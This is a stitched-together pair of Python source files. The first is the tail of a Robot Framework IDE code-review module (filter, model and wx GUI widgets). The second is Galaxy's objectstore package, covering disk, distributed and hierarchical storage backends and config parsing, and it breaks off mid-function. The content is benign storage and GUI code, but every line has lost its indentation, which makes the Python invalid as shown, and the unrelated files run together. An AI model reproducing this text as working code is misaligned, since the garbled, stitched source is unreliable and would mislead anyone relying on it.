if isinstance(datafile, TestDataDirectoryController):
return False
if not self.active:
return True
if not self.check_testcases and isinstance(datafile, TestCaseFileController):
return False
if not self.check_resources and isinstance(datafile, ResourceFileController):
return False
if not self._strings:
return True
return self.excludes ^ any(self._results(datafile.name))
def _results(self, name):
for string in self._strings:
if self.use_regex:
yield bool(re.match(string, name))
else:
yield string in name
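# Illustrative sketch of how ReviewRunner drives ResultFilter (values are
# examples only, not part of the original module):
#
#     f = ResultFilter()
#     f.active = True                    # filter pane expanded
#     f.set_strings(['common', 'abc'])   # from the comma-separated input field
#     f.excludes = True                  # "exclude" mode: files whose name matches are skipped
#     f.include_file(datafile)           # True unless datafile.name contains 'common' or 'abc'
#     f.excludes = False                 # "include" mode: only matching files are searched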
class ResultModel(object):
def __init__(self):
self.clear_search()
def clear_search(self):
self.status = ''
self.keywords = []
self.searching = False
def add_unused_keyword(self, keyword):
self.keywords += [keyword]
def begin_search(self):
self.searching = True
def end_search(self):
self.searching = False
class ResultListCtrl(wx.ListCtrl, listmix.CheckListCtrlMixin, listmix.ListCtrlAutoWidthMixin):
def __init__(self, parent, style):
self.parent = parent
wx.ListCtrl.__init__(self, parent=parent, style=style)
listmix.CheckListCtrlMixin.__init__(self)
listmix.ListCtrlAutoWidthMixin.__init__(self)
self.setResizeColumn(2)
self._clientData = {}
def set_dialog(self, dialog):
self._dlg = dialog
def OnCheckItem(self, index, flag):
if self._dlg:
self._dlg.item_in_kw_list_checked()
else:
print("No dialog set")
def get_next_checked_item(self):
for i in range(self.GetItemCount()):
if self.IsChecked(i):
item = self.GetItem(i)
return ([i, self.GetClientData(item.GetData()), item])
return None
def get_number_of_checked_items(self):
count = 0
for i in range(self.GetItemCount()):
if self.IsChecked(i):
count += 1
return count
def SetClientData(self, index, data):
self._clientData[index] = data
def GetClientData(self, index):
return self._clientData.get(index, None)
def RemoveClientData(self, index):
del self._clientData[index]
def ClearAll(self):
self.DeleteAllItems()
self._clientData.clear()
def print_data(self):
print(self._clientData)
class MyCollapsiblePane(wx.CollapsiblePane):
def __init__(self, parent, *args, **kwargs):
wx.CollapsiblePane.__init__(self, parent, *args, **kwargs)
self.Bind(wx.EVT_SIZE, self._recalc_size)
def _recalc_size(self, event=None):
if self.IsExpanded():
expand_button_height = 32 # good guess...
height = 150 if IS_MAC else 135
self.SetSizeHints(650, height + expand_button_height)
if self.IsCollapsed():
self.SetSizeHints(650, 40)
if event:
event.Skip()
def on_change(self, event):
self.GetParent().Layout()
|
__init__.py
|
"""
objectstore package, abstraction for storing blobs of data for use in Galaxy.
All providers ensure that data can be accessed on the filesystem for running
tools.
"""
import logging
import os
import random
import shutil
import threading
import time
from xml.etree import ElementTree
import yaml
try:
from sqlalchemy.orm import object_session
except ImportError:
object_session = None
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
force_symlink,
umask_fix_perms,
)
from galaxy.util.odict import odict
from galaxy.util.path import (
safe_makedirs,
safe_relpath,
)
from galaxy.util.sleeper import Sleeper
NO_SESSION_ERROR_MESSAGE = "Attempted to 'create' object store entity in configuration with no database session present."
log = logging.getLogger(__name__)
class ObjectStore(object):
"""ObjectStore abstract interface.
FIELD DESCRIPTIONS (these apply to all the methods in this class):
:type obj: StorableObject
:param obj: A Galaxy object with an assigned database ID accessible via
the .id attribute.
:type base_dir: string
:param base_dir: A key in `self.extra_dirs` corresponding to the base
directory in which this object should be created, or `None` to specify
the default directory.
:type dir_only: boolean
:param dir_only: If `True`, check only the path where the file identified
by `obj` should be located, not the dataset itself. This option applies
to `extra_dir` argument as well.
:type extra_dir: string
:param extra_dir: Append `extra_dir` to the directory structure where the
dataset identified by `obj` should be located. (e.g.,
000/extra_dir/obj.id). Valid values include 'job_work' (defaulting to
config.jobs_directory =
'$GALAXY_ROOT/database/jobs_directory');
'temp' (defaulting to config.new_file_path =
'$GALAXY_ROOT/database/tmp').
:type extra_dir_at_root: boolean
:param extra_dir_at_root: Applicable only if `extra_dir` is set. If True,
the `extra_dir` argument is placed at root of the created directory
structure rather than at the end (e.g., extra_dir/000/obj.id vs.
000/extra_dir/obj.id)
:type alt_name: string
:param alt_name: Use this name as the alternative name for the created
dataset rather than the default.
:type obj_dir: boolean
:param obj_dir: Append a subdirectory named with the object's ID (e.g.
000/obj.id)
"""
def __init__(self, config, config_dict={}, **kwargs):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the following attributes:
* object_store_check_old_style (only used by the
:class:`DiskObjectStore` subclass)
* jobs_directory -- Each job is given a unique empty directory
as its current working directory. This option defines in what
parent directory those directories will be created.
* new_file_path -- Used to set the 'temp' extra_dir.
"""
self.running = True
self.config = config
self.check_old_style = config.object_store_check_old_style
self.store_by = config_dict.get("store_by", None) or getattr(config, "object_store_store_by", "id")
assert self.store_by in ["id", "uuid"]
extra_dirs = {}
extra_dirs['job_work'] = config.jobs_directory
extra_dirs['temp'] = config.new_file_path
extra_dirs.update(dict(
(e['type'], e['path']) for e in config_dict.get('extra_dirs', [])))
self.extra_dirs = extra_dirs
def shutdown(self):
"""Close any connections for this ObjectStore."""
self.running = False
def exists(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None):
"""Return True if the object identified by `obj` exists, False otherwise."""
raise NotImplementedError()
def file_ready(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Check if a file corresponding to a dataset is ready to be used.
Return True if so, False otherwise
"""
return True
def create(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Mark the object (`obj`) as existing in the store, but with no content.
This method will create a proper directory structure for
the file if the directory does not already exist.
"""
raise NotImplementedError()
def empty(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return True if the object identified by `obj` has no content (i.e. is empty), False otherwise.
If the object does not exist raises `ObjectNotFound`.
"""
raise NotImplementedError()
def size(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return size of the object identified by `obj`.
If the object does not exist, return 0.
"""
raise NotImplementedError()
def delete(self, obj, entire_dir=False, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Delete the object identified by `obj`.
:type entire_dir: boolean
:param entire_dir: If True, delete the entire directory pointed to by
extra_dir. For safety reasons, this option applies
only for and in conjunction with the extra_dir or
obj_dir options.
"""
raise NotImplementedError()
def get_data(self, obj, start=0, count=-1, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Fetch `count` bytes of data offset by `start` bytes using `obj.id`.
If the object does not exist raises `ObjectNotFound`.
:type start: int
:param start: Set the position to start reading the dataset file
:type count: int
:param count: Read at most `count` bytes from the dataset
"""
raise NotImplementedError()
def get_filename(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Get the expected filename with absolute path for object with id `obj.id`.
This can be used to access the contents of the object.
"""
raise NotImplementedError()
def update_from_file(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, file_name=None, create=False):
"""
Inform the store that the file associated with `obj.id` has been updated.
If `file_name` is provided, update from that file instead of the
default.
If the object does not exist raises `ObjectNotFound`.
:type file_name: string
:param file_name: Use file pointed to by `file_name` as the source for
updating the dataset identified by `obj`
:type create: boolean
:param create: If True and the default dataset does not exist, create
it first.
"""
raise NotImplementedError()
def get_object_url(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return the URL for direct access if supported, otherwise return None.
Note: need to be careful to not bypass dataset security with this.
"""
raise NotImplementedError()
def get_store_usage_percent(self):
"""Return the percentage indicating how full the store is."""
raise NotImplementedError()
@classmethod
def parse_xml(clazz, config_xml):
"""Parse an XML description of a configuration for this object store.
Return a configuration dictionary (such as would correspond to the YAML configuration)
for the object store.
"""
raise NotImplementedError()
@classmethod
def from_xml(clazz, config, config_xml, **kwd):
config_dict = clazz.parse_xml(config_xml)
return clazz(config, config_dict, **kwd)
def to_dict(self):
extra_dirs = []
for extra_dir_type, extra_dir_path in self.extra_dirs.items():
extra_dirs.append({"type": extra_dir_type, "path": extra_dir_path})
return {
'config': config_to_dict(self.config),
'extra_dirs': extra_dirs,
'store_by': self.store_by,
'type': self.store_type,
}
def _get_object_id(self, obj):
return getattr(obj, self.store_by)
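# Illustrative note (paths are examples only, assuming store_by == 'id' and the
# default 'dataset_<id>.dat' naming used by DiskObjectStore below): for an
# object with id=1 the arguments documented above compose paths roughly as
#
#     default:                        <files_dir>/000/dataset_1.dat
#     extra_dir='job_work':           <files_dir>/000/job_work/dataset_1.dat
#     extra_dir + extra_dir_at_root:  <files_dir>/job_work/000/dataset_1.dat
#     obj_dir=True:                   <files_dir>/000/1/dataset_1.dat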
class DiskObjectStore(ObjectStore):
"""
Standard Galaxy object store.
Stores objects in files under a specific directory on disk.
>>> from galaxy.util.bunch import Bunch
>>> import tempfile
>>> file_path=tempfile.mkdtemp()
>>> obj = Bunch(id=1)
>>> s = DiskObjectStore(Bunch(umask=0o077, jobs_directory=file_path, new_file_path=file_path, object_store_check_old_style=False), dict(files_dir=file_path))
>>> s.create(obj)
>>> s.exists(obj)
True
>>> assert s.get_filename(obj) == file_path + '/000/dataset_1.dat'
"""
store_type = 'disk'
def __init__(self, config, config_dict):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`ObjectStore` plus:
* file_path -- Default directory to store objects to disk in.
* umask -- the permission bits for newly created files.
:type file_path: str
:param file_path: Override for the `config.file_path` value.
:type extra_dirs: dict
:param extra_dirs: Keys are string, values are directory paths.
"""
super(DiskObjectStore, self).__init__(config, config_dict)
self.file_path = config_dict.get("files_dir") or config.file_path
@classmethod
def parse_xml(clazz, config_xml):
extra_dirs = []
config_dict = {}
if config_xml is not None:
for e in config_xml:
if e.tag == 'files_dir':
config_dict["files_dir"] = e.get('path')
else:
extra_dirs.append({"type": e.get('type'), "path": e.get('path')})
config_dict["extra_dirs"] = extra_dirs
return config_dict
def to_dict(self):
as_dict = super(DiskObjectStore, self).to_dict()
as_dict["files_dir"] = self.file_path
return as_dict
def _get_filename(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return the absolute path for the file corresponding to the `obj.id`.
This is regardless of whether or not the file exists.
"""
path = self._construct_path(obj, base_dir=base_dir, dir_only=dir_only, extra_dir=extra_dir,
extra_dir_at_root=extra_dir_at_root, alt_name=alt_name,
obj_dir=False, old_style=True)
# For backward compatibility: check the old style root path first;
# otherwise construct hashed path.
if not os.path.exists(path):
return self._construct_path(obj, base_dir=base_dir, dir_only=dir_only, extra_dir=extra_dir,
extra_dir_at_root=extra_dir_at_root, alt_name=alt_name)
# The old-style path already exists on disk, so use it
return path
# TODO: rename to _disk_path or something like that to avoid conflicts with
# children that'll use the local_extra_dirs decorator, e.g. S3
def _construct_path(self, obj, old_style=False, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs):
"""
Construct the absolute path for accessing the object identified by `obj.id`.
:type base_dir: string
:param base_dir: A key in self.extra_dirs corresponding to the base
directory in which this object should be created, or
None to specify the default directory.
:type dir_only: boolean
:param dir_only: If True, check only the path where the file
identified by `obj` should be located, not the
dataset itself. This option applies to `extra_dir`
argument as well.
:type extra_dir: string
:param extra_dir: Append the value of this parameter to the expected
path used to access the object identified by `obj` (e.g.,
/files/000/<extra_dir>/dataset_10.dat).
:type alt_name: string
:param alt_name: Use this name as the alternative name for the returned
dataset rather than the default.
:type old_style: boolean
:param old_style: This option is used for backward compatibility. If
`True` then the composed directory structure does not include a
hash id (e.g., /files/dataset_10.dat (old) vs.
/files/000/dataset_10.dat (new))
"""
base = os.path.abspath(self.extra_dirs.get(base_dir, self.file_path))
# extra_dir should never be constructed from provided data but just
# make sure there are no shenanigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name and not safe_relpath(alt_name):
log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
if old_style:
if extra_dir is not None:
path = os.path.join(base, extra_dir)
else:
path = base
else:
# Construct hashed path
obj_id = self._get_object_id(obj)
rel_path = os.path.join(*directory_hash_id(obj_id))
# Create a subdirectory for the object ID
if obj_dir:
rel_path = os.path.join(rel_path, str(obj_id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
path = os.path.join(base, rel_path)
if not dir_only:
path = os.path.join(path, alt_name if alt_name else "dataset_%s.dat" % obj_id)
return os.path.abspath(path)
def exists(self, obj, **kwargs):
"""Override `ObjectStore`'s stub and check on disk."""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
# For backward compatibility: check root path first; otherwise
# construct and check hashed path.
if os.path.exists(path):
return True
return os.path.exists(self._construct_path(obj, **kwargs))
def create(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by creating any files and folders on disk."""
if not self.exists(obj, **kwargs):
path = self._construct_path(obj, **kwargs)
dir_only = kwargs.get('dir_only', False)
# Create directory if it does not exist
dir = path if dir_only else os.path.dirname(path)
safe_makedirs(dir)
# Create the file if it does not exist
if not dir_only:
open(path, 'w').close() # Should be rb?
umask_fix_perms(path, self.config.umask, 0o666)
def empty(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by checking file size on disk."""
return self.size(obj, **kwargs) == 0
def size(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by return file size on disk.
Returns 0 if the object doesn't exist yet or other error.
"""
if self.exists(obj, **kwargs):
try:
filepath = self.get_filename(obj, **kwargs)
for _ in range(0, 2):
size = os.path.getsize(filepath)
if size != 0:
break
# May be legitimately 0, or there may be an issue with the FS / kernel, so we try again
time.sleep(0.01)
return size
except OSError:
return 0
else:
return 0
def delete(self, obj, entire_dir=False, **kwargs):
"""Override `ObjectStore`'s stub; delete the file or folder on disk."""
path = self.get_filename(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
obj_dir = kwargs.get('obj_dir', False)
try:
if entire_dir and (extra_dir or obj_dir):
shutil.rmtree(path)
return True
if self.exists(obj, **kwargs):
os.remove(path)
return True
except OSError as ex:
log.critical('%s delete error %s' % (self._get_filename(obj, **kwargs), ex))
return False
def get_data(self, obj, start=0, count=-1, **kwargs):
"""Override `ObjectStore`'s stub; retrieve data directly from disk."""
data_file = open(self.get_filename(obj, **kwargs), 'r') # Should be rb?
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def get_filename(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
If `object_store_check_old_style` is set to `True` in config then the
root path is checked first.
"""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
# For backward compatibility, check root path first; otherwise,
# construct and return hashed path
if os.path.exists(path):
return path
return self._construct_path(obj, **kwargs)
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
"""`create` parameter is not used in this implementation."""
preserve_symlinks = kwargs.pop('preserve_symlinks', False)
# FIXME: symlinks and the object store model may not play well together
# these should be handled better, e.g. registering the symlink'd file
# as an object
if create:
self.create(obj, **kwargs)
if file_name and self.exists(obj, **kwargs):
try:
if preserve_symlinks and os.path.islink(file_name):
force_symlink(os.readlink(file_name), self.get_filename(obj, **kwargs))
else:
path = self.get_filename(obj, **kwargs)
shutil.copy(file_name, path)
umask_fix_perms(path, self.config.umask, 0o666)
except IOError as ex:
log.critical('Error copying %s to %s: %s' % (file_name, self._get_filename(obj, **kwargs), ex))
raise ex
def get_object_url(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
Returns `None`, we have no URLs.
"""
return None
def get_store_usage_percent(self):
"""Override `ObjectStore`'s stub by return percent storage used."""
st = os.statvfs(self.file_path)
return (float(st.f_blocks - st.f_bavail) / st.f_blocks) * 100
class NestedObjectStore(ObjectStore):
"""
Base for ObjectStores that use other ObjectStores.
Example: DistributedObjectStore, HierarchicalObjectStore
"""
def __init__(self, config, config_xml=None):
"""Extend `ObjectStore`'s constructor."""
super(NestedObjectStore, self).__init__(config)
self.backends = {}
def shutdown(self):
"""For each backend, shuts them down."""
for store in self.backends.values():
store.shutdown()
super(NestedObjectStore, self).shutdown()
def exists(self, obj, **kwargs):
"""Determine if the `obj` exists in any of the backends."""
return self._call_method('exists', obj, False, False, **kwargs)
def file_ready(self, obj, **kwargs):
"""Determine if the file for `obj` is ready to be used by any of the backends."""
return self._call_method('file_ready', obj, False, False, **kwargs)
def create(self, obj, **kwargs):
"""Create a backing file in a random backend."""
random.choice(list(self.backends.values())).create(obj, **kwargs)
def empty(self, obj, **kwargs):
"""For the first backend that has this `obj`, determine if it is empty."""
return self._call_method('empty', obj, True, False, **kwargs)
def size(self, obj, **kwargs):
"""For the first backend that has this `obj`, return its size."""
return self._call_method('size', obj, 0, False, **kwargs)
def delete(self, obj, **kwargs):
"""For the first backend that has this `obj`, delete it."""
return self._call_method('delete', obj, False, False, **kwargs)
def get_data(self, obj, **kwargs):
"""For the first backend that has this `obj`, get data from it."""
return self._call_method('get_data', obj, ObjectNotFound, True, **kwargs)
def get_filename(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its filename."""
return self._call_method('get_filename', obj, ObjectNotFound, True, **kwargs)
def update_from_file(self, obj, **kwargs):
"""For the first backend that has this `obj`, update it from the given file."""
if kwargs.get('create', False):
self.create(obj, **kwargs)
kwargs['create'] = False
return self._call_method('update_from_file', obj, ObjectNotFound, True, **kwargs)
def get_object_url(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its URL."""
return self._call_method('get_object_url', obj, None, False, **kwargs)
def _repr_object_for_exception(self, obj):
try:
# there are a few objects in python that don't have __class__
obj_id = self._get_object_id(obj)
return '{}({}={})'.format(obj.__class__.__name__, self.store_by, obj_id)
except AttributeError:
return str(obj)
def _call_method(self, method, obj, default, default_is_exception,
**kwargs):
"""Check all children object stores for the first one with the dataset."""
for key, store in self.backends.items():
if store.exists(obj, **kwargs):
return store.__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default('objectstore, _call_method failed: %s on %s, kwargs: %s'
% (method, self._repr_object_for_exception(obj), str(kwargs)))
else:
return default
class DistributedObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects the first store where the object exists is used.
When creating objects they are created in a store selected randomly, but
with weighting.
"""
store_type = 'distributed'
def __init__(self, config, config_dict, fsmon=False):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`NestedObjectStore` plus:
* distributed_object_store_config_file
:type config_xml: ElementTree
:type fsmon: bool
:param fsmon: If True, monitor the file system for free space,
removing backends when they get too full.
"""
super(DistributedObjectStore, self).__init__(config, config_dict)
self.backends = {}
self.weighted_backend_ids = []
self.original_weighted_backend_ids = []
self.max_percent_full = {}
self.global_max_percent_full = config_dict.get("global_max_percent_full", 0)
random.seed()
backends_def = config_dict["backends"]
for backend_def in backends_def:
backend_id = backend_def["id"]
file_path = backend_def["files_dir"]
extra_dirs = backend_def.get("extra_dirs", [])
maxpctfull = backend_def.get("max_percent_full", 0)
weight = backend_def["weight"]
disk_config_dict = dict(files_dir=file_path, extra_dirs=extra_dirs)
self.backends[backend_id] = DiskObjectStore(config, disk_config_dict)
self.max_percent_full[backend_id] = maxpctfull
log.debug("Loaded disk backend '%s' with weight %s and file_path: %s" % (backend_id, weight, file_path))
for i in range(0, weight):
# The simplest way to do weighting: add backend ids to a
# sequence the number of times equalling weight, then randomly
# choose a backend from that sequence at creation
self.weighted_backend_ids.append(backend_id)
self.original_weighted_backend_ids = self.weighted_backend_ids
self.sleeper = None
if fsmon and (self.global_max_percent_full or [_ for _ in self.max_percent_full.values() if _ != 0.0]):
self.sleeper = Sleeper()
self.filesystem_monitor_thread = threading.Thread(target=self.__filesystem_monitor)
self.filesystem_monitor_thread.setDaemon(True)
self.filesystem_monitor_thread.start()
log.info("Filesystem space monitor started")
@classmethod
def parse_xml(clazz, config_xml, legacy=False):
if legacy:
backends_root = config_xml
else:
backends_root = config_xml.find('backends')
backends = []
config_dict = {
'global_max_percent_full': float(backends_root.get('maxpctfull', 0)),
'backends': backends,
}
for elem in [e for e in backends_root if e.tag == 'backend']:
id = elem.get('id')
weight = int(elem.get('weight', 1))
maxpctfull = float(elem.get('maxpctfull', 0))
elem_type = elem.get('type', 'disk')
if elem_type:
path = None
extra_dirs = []
for sub in elem:
if sub.tag == 'files_dir':
path = sub.get('path')
elif sub.tag == 'extra_dir':
type = sub.get('type')
extra_dirs.append({"type": type, "path": sub.get('path')})
backend_dict = {
'id': id,
'weight': weight,
'max_percent_full': maxpctfull,
'files_dir': path,
'extra_dirs': extra_dirs,
'type': elem_type,
}
backends.append(backend_dict)
return config_dict
@classmethod
def from_xml(clazz, config, config_xml, fsmon=False):
legacy = False
if config_xml is None:
distributed_config = config.distributed_object_store_config_file
assert distributed_config is not None, \
"distributed object store ('object_store = distributed') " \
"requires a config file, please set one in " \
"'distributed_object_store_config_file')"
log.debug('Loading backends for distributed object store from %s', distributed_config)
config_xml = ElementTree.parse(distributed_config).getroot()
legacy = True
else:
log.debug('Loading backends for distributed object store from %s', config_xml.get('id'))
config_dict = clazz.parse_xml(config_xml, legacy=legacy)
return clazz(config, config_dict, fsmon=fsmon)
def to_dict(self):
as_dict = super(DistributedObjectStore, self).to_dict()
as_dict["global_max_percent_full"] = self.global_max_percent_full
backends = []
for backend_id, backend in self.backends.items():
backend_as_dict = backend.to_dict()
backend_as_dict["id"] = backend_id
backend_as_dict["max_percent_full"] = self.max_percent_full[backend_id]
backend_as_dict["weight"] = len([i for i in self.original_weighted_backend_ids if i == backend_id])
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def shutdown(self):
"""Shut down. Kill the free space monitor if there is one."""
super(DistributedObjectStore, self).shutdown()
if self.sleeper is not None:
self.sleeper.wake()
def __filesystem_monitor(self):
while self.running:
new_weighted_backend_ids = self.original_weighted_backend_ids
for id, backend in self.backends.items():
maxpct = self.max_percent_full[id] or self.global_max_percent_full
pct = backend.get_store_usage_percent()
if pct > maxpct:
new_weighted_backend_ids = [_ for _ in new_weighted_backend_ids if _ != id]
self.weighted_backend_ids = new_weighted_backend_ids
self.sleeper.sleep(120) # Test free space every 2 minutes
def create(self, obj, **kwargs):
"""The only method in which obj.object_store_id may be None."""
if obj.object_store_id is None or not self.exists(obj, **kwargs):
if obj.object_store_id is None or obj.object_store_id not in self.backends:
try:
obj.object_store_id = random.choice(self.weighted_backend_ids)
except IndexError:
raise ObjectInvalid('objectstore.create, could not generate '
'obj.object_store_id: %s, kwargs: %s'
% (str(obj), str(kwargs)))
_create_object_in_session(obj)
log.debug("Selected backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id))
else:
log.debug("Using preferred backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id))
self.backends[obj.object_store_id].create(obj, **kwargs)
def _call_method(self, method, obj, default, default_is_exception, **kwargs):
object_store_id = self.__get_store_id_for(obj, **kwargs)
if object_store_id is not None:
return self.backends[object_store_id].__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default('objectstore, _call_method failed: %s on %s, kwargs: %s'
% (method, self._repr_object_for_exception(obj), str(kwargs)))
else:
return default
def __get_store_id_for(self, obj, **kwargs):
if obj.object_store_id is not None:
if obj.object_store_id in self.backends:
return obj.object_store_id
else:
log.warning('The backend object store ID (%s) for %s object with ID %s is invalid'
% (obj.object_store_id, obj.__class__.__name__, obj.id))
# if this instance has been switched from a non-distributed to a
# distributed object store, or if the object's store id is invalid,
# try to locate the object
for id, store in self.backends.items():
if store.exists(obj, **kwargs):
log.warning('%s object with ID %s found in backend object store with ID %s'
% (obj.__class__.__name__, obj.id, id))
obj.object_store_id = id
_create_object_in_session(obj)
return id
return None
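# Illustrative config_dict accepted by DistributedObjectStore (key names match
# parse_xml above; the ids, paths and weights are made-up examples):
#
#     {'global_max_percent_full': 90.0,
#      'backends': [
#          {'id': 'files1', 'type': 'disk', 'weight': 2, 'max_percent_full': 0,
#           'files_dir': '/data/files1', 'extra_dirs': []},
#          {'id': 'files2', 'type': 'disk', 'weight': 1, 'max_percent_full': 95,
#           'files_dir': '/data/files2', 'extra_dirs': []},
#      ]}
#
# With these weights, new datasets land in 'files1' about twice as often as in
# 'files2', until a backend exceeds its max_percent_full and is dropped by the
# filesystem monitor.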
class HierarchicalObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects the first store where the object exists is used.
When creating objects only the first store is used.
"""
store_type = 'hierarchical'
def __init__(self, config, config_dict, fsmon=False):
"""The default contructor. Extends `NestedObjectStore`."""
super(HierarchicalObjectStore, self).__init__(config, config_dict)
backends = odict()
for order, backend_def in enumerate(config_dict["backends"]):
backends[order] = build_object_store_from_config(config, config_dict=backend_def, fsmon=fsmon)
self.backends = backends
@classmethod
def parse_xml(clazz, config_xml):
backends_list = []
for b in sorted(config_xml.find('backends'), key=lambda b: int(b.get('order'))):
store_type = b.get("type")
objectstore_class, _ = type_to_object_store_class(store_type)
backend_config_dict = objectstore_class.parse_xml(b)
backend_config_dict["type"] = store_type
backends_list.append(backend_config_dict)
return {"backends": backends_list}
def to_dict(self):
as_dict = super(HierarchicalObjectStore, self).to_dict()
backends = []
for backend_id, backend in self.backends.items():
backend_as_dict = backend.to_dict()
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def exists(self, obj, **kwargs):
"""Check all child object stores."""
for store in self.backends.values():
if store.exists(obj, **kwargs):
return True
return False
def create(self, obj, **kwargs):
"""Call the primary object store."""
self.backends[0].create(obj, **kwargs)
def type_to_object_store_class(store, fsmon=False):
objectstore_class = None
objectstore_constructor_kwds = {}
if store == 'disk':
objectstore_class = DiskObjectStore
elif store == 's3':
from .s3 import S3ObjectStore
objectstore_class = S3ObjectStore
elif store == 'cloud':
from .cloud import Cloud
objectstore_class = Cloud
elif store == 'swift':
from .s3 import SwiftObjectStore
objectstore_class = SwiftObjectStore
elif store == 'distributed':
objectstore_class = DistributedObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == 'hierarchical':
objectstore_class = HierarchicalObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == 'irods':
from .rods import IRODSObjectStore
objectstore_class = IRODSObjectStore
elif store == 'azure_blob':
from .azure_blob import AzureBlobObjectStore
objectstore_class = AzureBlobObjectStore
elif store == 'pithos':
from .pithos import PithosObjectStore
objectstore_class = PithosObjectStore
# Disable the Pulsar object store for now until it receives some attention
# elif store == 'pulsar':
# from .pulsar import PulsarObjectStore
# return PulsarObjectStore(config=config, config_xml=config_xml)
return objectstore_class, objectstore_constructor_kwds
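# Illustrative use of the factory above (a sketch, not part of the module):
#
#     cls, kwds = type_to_object_store_class('distributed', fsmon=True)
#     # cls  -> DistributedObjectStore
#     # kwds -> {'fsmon': True}
#     store = cls.from_xml(config, config_xml, **kwds)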
def build_object_store_from_config(config, fsmon=False, config_xml=None, config_dict=None):
"""
Invoke the appropriate object store.
Will use the `object_store_config_file` attribute of the `config` object to
configure a new object store from the specified XML file.
Or you can specify the object store type in the `object_store` attribute of
the `config` object. Currently 'disk', 's3', 'cloud', 'swift', 'distributed',
'hierarchical', 'irods', 'azure_blob', and 'pithos' are supported values.
"""
from_object = 'xml'
if config_xml is None and config_dict is None:
config_file = config.object_store_config_file
if os.path.exists(config_file):
if config_file.endswith(".xml") or config_file.endswith(".xml.sample"):
# This is a top level invocation of build_object_store_from_config, and
# we have an object_store_conf.xml -- read the .xml and build
# accordingly
config_xml = ElementTree.parse(config.object_store_config_file).getroot()
store = config_xml.get('type')
else:
with open(config_file, "rt") as f:
config_dict = yaml.safe_load(f)
from_object = 'dict'
store = config_dict.get('type')
else:
store = config.object_store
elif config_xml is not None:
store = config_xml.get('type')
elif config_dict is not None:
from_object = 'dict'
store = config_dict.get('type')
objectstore_class, objectstore_constructor_kwds = type_to_object_store_class(store, fsmon=fsmon)
if objectstore_class is None:
log.error("Unrecognized object store definition: {0}".format(store))
if from_object == 'xml':
return objectstore_class.from_xml(config=config, config_xml=config_xml, **objectstore_constructor_kwds)
else:
return objectstore_class(config=config, config_dict=config_dict, **objectstore_constructor_kwds)
def local_extra_dirs(func):
"""Non-local plugin decorator using local directories for the extra_dirs (job_work and temp)."""
def wraps(self, *args, **kwargs):
if kwargs.get('base_dir', None) is None:
return func(self, *args, **kwargs)
else:
for c in self.__class__.__mro__:
if c.__name__ == 'DiskObjectStore':
return getattr(c, func.__name__)(self, *args, **kwargs)
raise Exception("Could not call DiskObjectStore's %s method, does your "
"Object Store plugin inherit from DiskObjectStore?"
% func.__name__)
return wraps
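# Sketch of how a non-local plugin might use the decorator above (the class and
# method below are hypothetical, not part of this module):
#
#     class S3LikeObjectStore(DiskObjectStore):
#         @local_extra_dirs
#         def create(self, obj, **kwargs):
#             ...  # remote creation; calls that pass base_dir (e.g. 'job_work'
#                  # or 'temp') are routed to DiskObjectStore.create instead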
def convert_bytes(bytes):
"""A helper function used for pretty printing disk usage."""
if bytes is None:
bytes = 0
bytes = float(bytes)
if bytes >= 1099511627776:
terabytes = bytes / 1099511627776
size = '%.2fTB' % terabytes
elif bytes >= 1073741824:
gigabytes = bytes / 1073741824
